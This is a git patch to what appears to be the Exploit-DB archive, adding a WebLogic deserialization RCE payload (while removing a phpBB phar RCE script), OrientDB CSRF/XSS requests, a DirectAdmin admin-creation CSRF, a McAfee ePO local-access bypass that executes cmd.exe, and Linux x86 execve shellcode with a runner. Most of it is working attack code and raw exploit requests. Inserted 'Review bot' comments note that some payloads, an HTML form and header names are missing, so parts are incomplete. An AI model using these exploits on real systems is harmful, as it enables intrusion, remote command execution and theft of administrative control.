From 790ba4b35ea84bc5e7c4d5df31d61e8c6239cabe Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 Mar 2019 05:02:48 +0000 Subject: [PATCH] DB: 2019-03-09 5 changes to exploits/shellcodes Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) phpBB 3.2.3 - Remote Code Execution OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting McAfee ePO 5.9.1 - Registered Executable Local Access Bypass DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes) --- exploits/multiple/remote/46513.java | 112 ++++++------ exploits/multiple/webapps/46517.txt | 268 ++++++++++++++++++++++++++++ exploits/php/webapps/46520.txt | 52 ++++++ exploits/windows/webapps/46518.txt | 45 +++++ files_exploits.csv | 7 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/46519.c | 107 +++++++++++ 7 files changed, 528 insertions(+), 64 deletions(-) create mode 100644 exploits/multiple/webapps/46517.txt create mode 100644 exploits/php/webapps/46520.txt create mode 100644 exploits/windows/webapps/46518.txt create mode 100644 shellcodes/linux_x86/46519.c diff --git a/exploits/multiple/remote/46513.java b/exploits/multiple/remote/46513.java index 97cb07a99..a9f90e502 100644 --- a/exploits/multiple/remote/46513.java +++ b/exploits/multiple/remote/46513.java 
@@ -1,64 +1,52 @@ -// All greets goes to RIPS Tech -// Run this JS on Attachment Settings ACP page -var plupload_salt = ''; -var form_token = ''; -var creation_time = ''; -var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip -// your payload here -var payload = '\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB'; -var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); -var sid = (new URL(document.location.href)).searchParams.get('sid'); -var url = '/adm/index.php'; -var getparams = { - 'i': 'acp_database', - 'sid': sid, - 'mode': 'backup' -}; -$.get(url, getparams, function(data) { - form_token = $(data).find('[name="form_token"]').val(); - creation_time = $(data).find('[name="creation_time"]').val(); - if(form_token && creation_time) { - var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; - var postdata = { - 'type': 'data', - 'method': 'text', - 'where': 'download', - 'table[]': 'phpbb_config', - 'submit': 'Submit', - 'creation_time': creation_time, - 'form_token': form_token - } - $.post(posturl.replace("|", sid), postdata, function (data) { - plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1]; - if (plupload_salt) { - filepath = filepath.replace("$salt", plupload_salt); - var 
postdata = new FormData(); - postdata.append('name', 'evil.zip'); - postdata.append('chunk', 0); - postdata.append('chunks', 2); - postdata.append('add_file', 'Add the file'); - postdata.append('real_filename', 'evil.zip'); - // file - var pharfile = new File([byteArray], 'evil.zip'); - postdata.append('fileupload', pharfile); - jQuery.ajax({ - url: '/posting.php?mode=reply&f=2&t=1', - data: postdata, - cache: false, - contentType: false, - processData: false, - method: 'POST', - success: function(data){ - if ("id" in data) { - $('#img_imagick').val(filepath).focus(); - $('html, body').animate({ - scrollTop: ($('#submit').offset().top) - }, 500); - } - } - }); +// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team +// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ +package ysoserial.payloads; - } - }, 'text'); +import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.PayloadRunner; + +import java.lang.reflect.Proxy; +import java.rmi.registry.Registry; +import java.rmi.server.ObjID; +import java.rmi.server.RemoteObjectInvocationHandler; +import java.util.Random; + + +@SuppressWarnings ( { + "restriction" +} ) +@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest") +@Authors({ Authors.MBECHLER }) +public class JRMPClient_20180718_bypass01 extends PayloadRunner implements +ObjectPayload { + public ReferenceWrapper_Stub getObject ( final String command ) throws Exception { + + String host; + int port; + int sep = command.indexOf(':'); + if ( sep < 0 ) { + port = new Random().nextInt(65535); + host = command; + } + else { + host = command.substring(0, sep); + port = Integer.valueOf(command.substring(sep + 1)); + } + ObjID id = new ObjID(new 
Random().nextInt()); + TCPEndpoint te = new TCPEndpoint(host, port); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref); + return stud; } -}); \ No newline at end of file + + + public static void main ( final String[] args ) throws Exception { + Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader()); + PayloadRunner.run(JRMPClient_20180718_bypass01.class, args); + } +} \ No newline at end of file diff --git a/exploits/multiple/webapps/46517.txt b/exploits/multiple/webapps/46517.txt new file mode 100644 index 000000000..6afad5972 --- /dev/null +++ b/exploits/multiple/webapps/46517.txt 
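Review bot: `port = Integer.valueOf(command.substring(sep + 1));` in getObject boxes and immediately unboxes, and the local `stud` two lines later is a typo for `stub` that only exists to be returned; `port = Integer.parseInt(command.substring(sep + 1));` and `return new ReferenceWrapper_Stub(ref);` are the idiomatic forms. The no-port branch draws `new Random().nextInt(65535)`, whose range is 0..65534, so it can yield port 0 and never 65535 — worth a comment if that is intended. The class has no Javadoc and its attribution is inconsistent: the header comment credits Zhiyi Zhang of 360 ESG Codesafe Team while `@Authors({ Authors.MBECHLER })` names the ysoserial JRMPClient author; a class Javadoc stating that this is apparently a variant of that payload, what the `host[:port]` argument means, and who authored the variant would resolve it.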
@@ -0,0 +1,268 @@ +################################################################################################################################## +# Exploit Title: OrientDB 3.0.17 GA Community Edition (March 7th, 2019) | Multiple Vulnerabilities +# Date: 07.03.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://orientdb.org +# Software Link: https://orientdb.org/download +# Version: 3.0.17 GA Community Edition (March 7th, 2019) +################################################################################################################################## + +Introduction + +OrientDB is the world’s fastest graph database. Period. An independent +benchmark study by IBM and the Tokyo Institute of Technology showed that +OrientDB is 10x faster than Neo4j on graph operations among all the +workloads. Drive competitive advantage and accelerate innovation with new +revenue streams. + +################################################################################# + +Vulnerabilities: CSRF | XSS Reflected & Stored + +################################################################################# + +CSRF details: + +################################################################################# + +CSRF1 + +Create Database + +POST /database/testdb/plocal/graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +Authorization: Basic cm9vdDpyb290 +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=- +Content-Length: 0 + +################################################################################# + +CSRF2 + +Delete Database + +DELETE /database/testdb HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 
6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +Authorization: Basic cm9vdDpyb290 +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=- + +################################################################################# + +CSRF3 + +Schema Manage New Vertex + +POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +content-type: text/plain +X-Requested-With: XMLHttpRequest +Content-Length: 33 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +CREATE CLASS `test` extends `V` + +################################################################################# + +CSRF4 + +Schema Manage Delete Vertex + +POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +content-type: text/plain +X-Requested-With: XMLHttpRequest +Content-Length: 17 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +DROP CLASS `test` + +################################################################################# + +CSRF5 + +Add User + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 
Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 108 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"} + +################################################################################# + +CSRF6 + +Delete User + +DELETE /document/demodb/5:3 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + + +################################################################################# + +CSRF7 + +Functions Management New + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 141 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":["test"]} + +################################################################################# + +CSRF8 + +Functions Management Delete + +DELETE 
/document/demodb/6:5 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + + +################################################################################# + +XSS details: + +################################################################################# + +XSS1 Stored + +Add User + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 133 +DNT: 1 +Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"} + +PoC + +XSS works on Security Manager Actions - Delete + +################################################################################# + +XSS2 Reflected + +URL +http://192.168.2.101:2480/document/demodb/-1:-1 + +METHOD +Post + +PARAMETER +name + +PAYLOAD + + +POST /document/demodb/-1:-1 HTTP/1.1 +Host: 192.168.2.101:2480 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.2.101:2480/studio/index.html +X-Requested-With: XMLHttpRequest +Content-Type: application/json;charset=utf-8 +Content-Length: 162 +DNT: 1 
+Connection: close +Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825 + +{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":null} + +PoC + +XSS works on Functions Management - Save + +################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/46520.txt b/exploits/php/webapps/46520.txt new file mode 100644 index 000000000..fbd1acc57 --- /dev/null +++ b/exploits/php/webapps/46520.txt @@ -0,0 +1,52 @@ +# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel +# Date: 03/03/2019 +# Exploit Author: ManhNho +# Vendor Homepage: https://www.directadmin.com/ +# Software Link: https://www.directadmin.com/ +# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN +# Version: 1.55 +# CVE: CVE-2019-9625 +# Tested on: Windows 10 / Kali Linux +# Category: Webapps + + +#1. Description +----------------------------------------------------- +DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to +create new admin account + +#2. PoC +----------------------------------------------------- +a) Send below crafted request to logged in user who is having admin +Administrator level access + + + + +
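Review bot: The request bodies printed under XSS1 and XSS2 are byte-identical to the benign CSRF5 and CSRF7 bodies, yet their `Content-Length` headers (133 and 162) are 25 bytes larger than those bodies as printed (108 and 137), so the script payload these two sections are meant to demonstrate is not present in the text. Most likely it was dropped by markup stripping when this page was rendered rather than missing from the committed file; if the file really reads like this, neither XSS section shows a reproducible finding and the `PAYLOAD` heading in XSS2 is followed by nothing before the raw request. The DirectAdmin file 46520.txt in the next hunk shows the same symptom where its HTML form should be.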
+ + + + + + + + + +
+ + + + +b) Once the logged in user opens the URL the form will get submitted +with active session of administrator and action get performed +successfully. + +#3. References + +----------------------------------------------------- + + +https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF + +https://nvd.nist.gov/vuln/detail/CVE-2019-9625 \ No newline at end of file diff --git a/exploits/windows/webapps/46518.txt b/exploits/windows/webapps/46518.txt new file mode 100644 index 000000000..2c9e7e5fb --- /dev/null +++ b/exploits/windows/webapps/46518.txt 
@@ -0,0 +1,45 @@ +# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass +# Date: 2019-03-07 +# Exploit Author: @leonjza +# Vendor Homepage: https://www.mcafee.com/ +# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html +# Version: ePO v5.9.1 +# Tested on: Windows Server 2012 +# CVE : cve-2018-6671 + +GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949 + +# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass +# Specifying an X-Forwarded-For header bypasses the local only check +# https://kc.mcafee.com/corporate/index?page=content&id=SB10240 +# https://nvd.nist.gov/vuln/detail/CVE-2018-6671 +# +# 2019 @leonjza +# +# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850 + +POST /Notifications/testRegExe.do HTTP/1.1 +Host: 192.168.1.26:8443 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) +Gecko/20100101 Firefox/66.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 284 +DNT: 1 +Connection: close +Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1; +orion.login.language="language:en&country:"; +orion.content.size="width:1384&height:699"; +JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15 +X-Forwarded-For: 127.0.0.1 + +orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c +whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard + + +-- +L. +:wq! \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03ebd7a35..9b3016995 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -17238,7 +17238,7 @@ id,file,description,date,author,type,platform,port 46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware, 46509,exploits/linux/remote/46509.rb,"Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)",2019-03-07,Metasploit,remote,linux,443 46510,exploits/php/remote/46510.rb,"Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)",2019-03-07,Metasploit,remote,php, -46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2019-10-25,allyshka,remote,multiple, +46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple, 46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple, 46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 
@@ -40962,4 +40962,7 @@ id,file,description,date,author,type,platform,port 46500,exploits/php/webapps/46500.txt,"OpenDocMan 1.3.4 - 'search.php where' SQL Injection",2019-03-05,"Mehmet EMIROGLU",webapps,php,80 46505,exploits/php/webapps/46505.txt,"Kados R10 GreenBee - Multiple SQL Injection",2019-03-07,"Mehmet EMIROGLU",webapps,php,80 46511,exploits/php/webapps/46511.js,"WordPress Core 5.0 - Remote Code Execution",2019-03-01,allyshka,webapps,php, -46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2019-12-12,allyshka,webapps,php, +46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2018-12-12,allyshka,webapps,php, +46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple, +46518,exploits/windows/webapps/46518.txt,"McAfee ePO 5.9.1 - Registered Executable Local Access Bypass",2019-03-08,leonjza,webapps,windows, +46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b548ce067..c9a944705 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -949,3 +949,4 @@ id,file,description,date,author,type,platform 46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86 +46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86 
diff --git a/shellcodes/linux_x86/46519.c b/shellcodes/linux_x86/46519.c new file mode 100644 index 000000000..7f900d3a9 --- /dev/null +++ b/shellcodes/linux_x86/46519.c 
@@ -0,0 +1,107 @@ +/* +''' +; Date: 07/03/2019 +; Insertion-Encoder.asm +; Author: Daniele Votta +; Description: This program encode shellcode with insertion technique (0xAA). +; Tested on: i686 GNU/Linux +''' + +#!/usr/bin/python +# Python Insertion Encoder + +import random + +# Execve /bin/sh (25 bytes) +shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" +encoded2 = "" + +print 'Encoded shellcode...' + +for x in bytearray(shellcode): + # Insertion Encoding + encoded += '\\x' + encoded += '%02x' % x + encoded += '\\x%02x' % 0xAA + # encoded += '\\x%02x' % random.randint(1,255) + + encoded2 += '0x' + encoded2 += '%02x,' % x + encoded2 += '0x%02x,' % 0xAA + # encoded2 += '0x%02x' % random.randint(1,255) + +print encoded +"\n" +print encoded2 +print 'Len: %d' % len(bytearray(shellcode)) +*/ + +#include +#include + +/* +; Insertion-Decoder.asm +; Author: Daniele Votta +; Description: This program decode shellcode with insertion technique (0xAA). 
+; Tested on: i686 GNU/Linux +; Shellcode Length:50 +; JMP | CALL | POP | Techniques + +Insertion-Decoder: file format elf32-i386 + +Disassembly of section .text: + +08048080 <_start>: + 8048080: eb 1d jmp 804809f + +08048082 : + 8048082: 5e pop esi + 8048083: 8d 7e 01 lea edi,[esi+0x1] + 8048086: 31 c0 xor eax,eax + 8048088: b0 01 mov al,0x1 + 804808a: 31 db xor ebx,ebx + +0804808c : + 804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1] + 804808f: 80 f3 aa xor bl,0xaa + 8048092: 75 10 jne 80480a4 + 8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1] + 8048098: 88 1f mov BYTE PTR [edi],bl + 804809a: 47 inc edi + 804809b: 04 02 add al,0x2 + 804809d: eb ed jmp 804808c + +0804809f : + 804809f: e8 de ff ff ff call 8048082 + +080480a4 : + 80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp + 80480aa: 68 aa 2f aa 2f push 0x2faa2faa + 80480af: aa stos BYTE PTR es:[edi],al + 80480b0: 73 aa jae 804805c <_start-0x24> + 80480b2: 68 aa 68 aa 2f push 0x2faa68aa + 80480b7: aa stos BYTE PTR es:[edi],al + 80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597] + 80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp + 80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp + 80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp + 80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533] + 80480d6: bb .byte 0xbb + 80480d7: bb .byte 0xbb +[+] Extract Shellcode ... 
+"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb" + +======================= POC Daniele Votta ======================= +*/ + +/* Insertion Encoded Execve /bin/sh (88 bytes) */ +unsigned char code[] = \ +"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"; + +int main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file
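Review bot: `printf("Shellcode Length: %d\n", strlen(code));` in main passes a `size_t` to `%d`, which is undefined behaviour under the C standard even if it prints the expected value on a 32-bit target; `printf("Shellcode Length: %zu\n", strlen(code));` is the correct form. The two `#include` directives above the decoder comment carry no header name — presumably `<stdio.h>` and `<string.h>` lost to markup stripping in this rendering; if the committed file really lacks them, `printf` and `strlen` are undeclared. The header comment's `Shellcode Length:50` describes only the encoded execve payload while the array is labelled 88 bytes; the disassembly puts the decoder stub at 0x8048080–0x80480a4 (36 bytes), so a comment such as `/* 36-byte decoder stub + 50 encoded bytes + trailing \xbb\xbb = 88 */` above `code[]` would reconcile the two figures.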